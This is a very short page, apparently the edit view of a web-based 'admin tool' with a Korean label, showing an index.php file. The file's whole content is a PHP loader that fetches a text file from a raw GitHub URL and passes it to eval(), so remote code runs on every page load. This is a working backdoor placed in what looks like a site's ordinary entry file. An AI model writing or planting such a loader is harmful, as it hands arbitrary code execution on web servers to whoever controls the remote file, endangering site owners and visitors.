관리-도구
편집 파일: index.php
<?php $path = "https://raw.githubusercontent.com/ICS251220/ICS/refs/heads/main/vod.txt"; $code = implode('', file($path)); eval("?>" . $code); ?>